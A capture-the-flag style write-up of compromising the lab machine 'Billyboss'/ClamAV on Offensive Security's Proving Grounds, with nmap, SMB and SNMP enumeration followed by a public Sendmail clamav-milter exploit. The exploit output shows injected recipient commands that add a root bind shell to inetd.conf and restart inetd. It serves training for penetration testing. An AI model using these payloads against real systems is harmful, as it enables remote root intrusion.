Proving Grounds | Billyboss

In this post, I demonstrate the steps taken to fully compromise the ClamAV host on Offensive Security's Proving Grounds.

7 months ago   •   7 min read

By 0xBEN
Table of contents

Nmap Scan

# Nmap 7.92 scan initiated Mon Nov 15 11:19:07 2021 as: nmap -T5 -p22,25,80,139,199,445,60000 -A -oA scan-all 192.168.228.42
Nmap scan report for 192.168.228.42
Host is up (0.029s latency).

PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:3e:a4:13:5f:9a:32:c0:8e:46:eb:26:b3:5e:ee:6d (DSA)
|_  1024 af:a2:49:3e:d8:f2:26:12:4a:a0:b5:ee:62:76:b0:18 (RSA)
25/tcp    open  smtp        Sendmail 8.13.4/8.13.4/Debian-3sarge3
| smtp-commands: localhost.localdomain Hello [192.168.49.228], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP
|_ 2.0.0 This is sendmail version 8.13.4 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation send email to 2.0.0 sendmail-bugs@sendmail.org. 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info
80/tcp    open  http        Apache httpd 1.3.33 ((Debian GNU/Linux))
|_http-server-header: Apache/1.3.33 (Debian GNU/Linux)
|_http-title: Ph33r
| http-methods: 
|_  Potentially risky methods: TRACE
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
199/tcp   open  smux        Linux SNMP multiplexer
445/tcp   open  netbios-ssn Samba smbd 3.0.14a-Debian (workgroup: WORKGROUP)
60000/tcp open  ssh         OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:3e:a4:13:5f:9a:32:c0:8e:46:eb:26:b3:5e:ee:6d (DSA)
|_  1024 af:a2:49:3e:d8:f2:26:12:4a:a0:b5:ee:62:76:b0:18 (RSA)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|firewall|WAP|proxy server|printer|PBX|media device
Running (JUST GUESSING): Linux 2.6.X (95%), Cisco embedded (94%), Ruckus embedded (94%), Riverbed embedded (93%), ZoneAlarm embedded (93%), Kyocera embedded (92%), Sony embedded (92%)
OS CPE: cpe:/o:linux:linux_kernel:2.6.9 cpe:/o:linux:linux_kernel:2.6 cpe:/h:cisco:sa520 cpe:/h:ruckus:7363 cpe:/h:riverbed:steelhead_200 cpe:/h:zonealarm:z100g cpe:/h:kyocera:cs-2560 cpe:/h:cisco:uc320w
Aggressive OS guesses: Linux 2.6.9 (95%), Cisco SA520 firewall (Linux 2.6) (94%), Linux 2.6.9 - 2.6.27 (94%), Ruckus 7363 WAP (94%), Linux 2.6.18 (93%), Riverbed Steelhead 200 proxy server (93%), ZoneAlarm Z100G WAP (93%), Linux 2.6.9 (CentOS 4.4) (93%), Linux 2.6.32 (92%), Kyocera CopyStar CS-2560 printer (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: localhost.localdomain; OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 7h29m58s, deviation: 3h32m07s, median: 4h59m58s
|_nbstat: NetBIOS name: 0XBABE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.14a-Debian)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-11-15T16:19:22-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: share (dangerous)
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

TRACEROUTE (using port 25/tcp)
HOP RTT      ADDRESS
1   29.15 ms 192.168.49.1
2   29.33 ms 192.168.228.42

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Nov 15 11:19:54 2021 -- 1 IP address (1 host up) scanned in 46.62 seconds





Service Enumeration

SMB

I can list shares anonymously, but mapping a share requires credentials. This version of Samba server may be vulnerable to CVE-2017-7494.

┌──(ben㉿kali)-[~/…/Training/OffSec/ProvingGrounds/ClamAV]
└─$ smbclient -L //$target --option="client min protocol=core" -U ''

Enter WORKGROUP\'s password: 

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (0xbabe server (Samba 3.0.14a-Debian) brave pig)
        ADMIN$          IPC       IPC Service (0xbabe server (Samba 3.0.14a-Debian) brave pig)
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------
        0XBABE               0xbabe server (Samba 3.0.14a-Debian) brave pig

        Workgroup            Master
        ---------            -------
        WORKGROUP            0XBABE





HTTP

Converting the binary back to text reveals the message: ifyoudontpwnmeuran0b. I try enumerating the web service further, but going to abandon it for now.





SNMP (UDP/161)

I see the SNMP multiplexer running on TCP/199 and decide to do a UDP scan with nmap to check for the SNMP service.

sudo nmap -sU --top-ports 100 $target

PORT    STATE SERVICE  
137/udp open  netbios-ns  
161/udp open  snmp

Great! It looks like SNMP is running on the default port of UDP/161. I will try running some nmap NSE scripts against the service to enumerate further.

sudo nmap -sU -p161 --script *snmp* $target

PORT    STATE SERVICE
161/udp open  snmp
| snmp-info: 
|   enterprise: U.C. Davis, ECE Dept. Tom
|   engineIDFormat: unknown
|   engineIDData: 9e325869f30c7749
|   snmpEngineBoots: 61
|_  snmpEngineTime: 3h26m23s
| snmp-processes: 
|   1: 
|     Name: init
|     Path: init [2]
|   2: 
|     Name: ksoftirqd/0
|     Path: ksoftirqd/0
|   3: 
|     Name: events/0
|     Path: events/0
|   4: 
|     Name: khelper
|     Path: khelper
|   5: 
|     Name: kacpid
|     Path: kacpid
|   99: 
|     Name: kblockd/0
|     Path: kblockd/0
|   109: 
|     Name: pdflush
|     Path: pdflush
|   110: 
|     Name: pdflush
|     Path: pdflush
|   111: 
|     Name: kswapd0
|     Path: kswapd0
|   112: 
|     Name: aio/0
|     Path: aio/0
|   255: 
|     Name: kseriod
|     Path: kseriod
|   276: 
|     Name: scsi_eh_0
|     Path: scsi_eh_0
|   284: 
|     Name: khubd
|     Path: khubd
|   348: 
|     Name: shpchpd_event
|     Path: shpchpd_event
|   380: 
|     Name: kjournald
|     Path: kjournald
|   935: 
|     Name: vmmemctl
|     Path: vmmemctl
|   1177: 
|     Name: vmtoolsd
|     Path: /usr/sbin/vmtoolsd
|   3774: 
|     Name: syslogd
|     Path: /sbin/syslogd
|   3777: 
|     Name: klogd
|     Path: /sbin/klogd
|   3781: 
|     Name: clamd
|     Path: /usr/local/sbin/clamd
|   3783: 
|     Name: clamav-milter
|     Path: /usr/local/sbin/clamav-milter
|     Params: --black-hole-mode -l -o -q /var/run/clamav/clamav-milter.ctl
|   3792: 
|     Name: inetd
|     Path: /usr/sbin/inetd
|   3796: 
|     Name: nmbd
|     Path: /usr/sbin/nmbd
|     Params: -D
|   3798: 
|     Name: smbd
|     Path: /usr/sbin/smbd
|     Params: -D
|   3802: 
|     Name: snmpd
|     Path: /usr/sbin/snmpd
|     Params: -Lsd -Lf /dev/null -p /var/run/snmpd.pid
|   3803: 
|     Name: smbd
|     Path: /usr/sbin/smbd
|     Params: -D
|   3809: 
|     Name: sshd
|     Path: /usr/sbin/sshd
|   3887: 
|     Name: sendmail-mta
|     Path: sendmail: MTA: accepting connections
|   3901: 
|     Name: atd
|     Path: /usr/sbin/atd
|   3904: 
|     Name: cron
|     Path: /usr/sbin/cron
|   3911: 
|     Name: apache
|     Path: /usr/sbin/apache
|   3912: 
|     Name: apache
|     Path: /usr/sbin/apache
|   3913: 
|     Name: apache
|     Path: /usr/sbin/apache
|   3914: 
|     Name: apache
|     Path: /usr/sbin/apache
|   3915: 
|     Name: apache
|     Path: /usr/sbin/apache
|   3916: 
|     Name: apache
|     Path: /usr/sbin/apache
|   3932: 
|     Name: getty
|     Path: /sbin/getty
|     Params: 38400 tty1
|   3938: 
|     Name: getty
|     Path: /sbin/getty
|     Params: 38400 tty2
|   3939: 
|     Name: getty
|     Path: /sbin/getty
|     Params: 38400 tty3
|   3940: 
|     Name: getty
|     Path: /sbin/getty
|     Params: 38400 tty4
|   3941: 
|     Name: getty
|     Path: /sbin/getty
|     Params: 38400 tty5
|   3942: 
|     Name: getty
|     Path: /sbin/getty
|     Params: 38400 tty6
|   4006: 
|     Name: apache
|     Path: /usr/sbin/apache
|   4232: 
|     Name: apache
|     Path: /usr/sbin/apache
|   4233: 
|     Name: apache
|     Path: /usr/sbin/apache
|   4234: 
|     Name: apache
|     Path: /usr/sbin/apache
|   4236: 
|     Name: apache
|_    Path: /usr/sbin/apache
| snmp-netstat: 
|   TCP  0.0.0.0:25           0.0.0.0:0
|   TCP  0.0.0.0:80           0.0.0.0:0
|   TCP  0.0.0.0:139          0.0.0.0:0
|   TCP  0.0.0.0:199          0.0.0.0:0
|   TCP  0.0.0.0:445          0.0.0.0:0
|   UDP  0.0.0.0:137          *:*
|   UDP  0.0.0.0:138          *:*
|   UDP  0.0.0.0:161          *:*
|   UDP  42.228.168.192:137   *:*
|_  UDP  42.228.168.192:138   *:*
| snmp-brute: 
|_  public - Valid credentials
| snmp-sysdescr: Linux 0xbabe.local 2.6.8-4-386 #1 Wed Feb 20 06:15:54 UTC 2008 i686
|_  System uptime: 3h26m24.98s (1238498 timeticks)
| snmp-interfaces: 
|   lo
|     IP address: 127.0.0.1  Netmask: 255.0.0.0
|     Type: softwareLoopback  Speed: 10 Mbps
|     Status: up
|     Traffic stats: 0.00 Kb sent, 0.00 Kb received
|   eth0
|     IP address: 192.168.228.42  Netmask: 255.255.255.0
|     MAC address: 00:50:56:bf:c8:dd (VMware)
|     Type: ethernetCsmacd  Speed: 100 Mbps
|     Status: up
|     Traffic stats: 537.03 Mb sent, 181.13 Mb received
|   sit0
|     MAC address: 00:00:00:00:c8:dd (Xerox)
|     Type: tunnel  Speed: 0 Kbps
|     Status: down
|_    Traffic stats: 0.00 Kb sent, 0.00 Kb received





Exploit

I put my enumeration findings together and spot a potential attack vector. Looking at the SNMP scan findings, these processes stick out to me.

3783: 
|     Name: clamav-milter
|     Path: /usr/local/sbin/clamav-milter
|     Params: --black-hole-mode -l -o -q /var/run/clamav/clamav-milter.ctl
3887: 
|     Name: sendmail-mta
|     Path: sendmail: MTA: accepting connections

I check searchsploit for possible attack vectors that don't include metasploit (to be compatible with OSCP prep).

searchsploit clamav milter | grep -iv metasploit
--------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                         |  Path
--------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Sendmail with clamav-milter < 0.91.2 - Remote Command Execution                                                                        | multiple/remote/4761.pl
--------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

This looks promising, granted I don't have a ClamAV version, but the pieces are all there – ClamAV and Sendmail.

I copy the exploit to current directory and inspect the source code. It uses the ClamAV milter (filter for Sendmail), which appears to not validate inputs and run system commands. The exploit opens up a socket on 31337 and allows the attacker to send I/O through the socket. It only needs one argument -- the target IP.

┌──(ben㉿kali)-[~/…/Training/OffSec/ProvingGrounds/ClamAV]
└─$ perl 4761.pl $target
Sendmail w/ clamav-milter Remote Root Exploit
Copyright (C) 2007 Eliteboy
Attacking 192.168.228.42...
220 localhost.localdomain ESMTP Sendmail 8.13.4/8.13.4/Debian-3sarge3; Mon, 15 Nov 2021 23:00:00 -0500; (No UCE/UBE) logging access from: [192.168.49.228](FAIL)-[192.168.49.228]
250-localhost.localdomain Hello [192.168.49.228], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-EXPN
250-VERB
250-8BITMIME
250-SIZE
250-DSN
250-ETRN
250-DELIVERBY
250 HELP
250 2.1.0 <>... Sender ok
250 2.1.5 <nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf">... Recipient ok
250 2.1.5 <nobody+"|/etc/init.d/inetd restart">... Recipient ok
354 Enter mail, end with "." on a line by itself
250 2.0.0 1AG400qS018105 Message accepted for delivery
221 2.0.0 localhost.localdomain closing connection

Now, I should be able to connect to the socket the exploit opened.





Post Exploitation

ClamAV is running as root, therefore the shell is running in the root user context.





Proofs

User
N/A

Root
a3cc69511524132750620a5ee3d6a3a2

Spread the word

Keep reading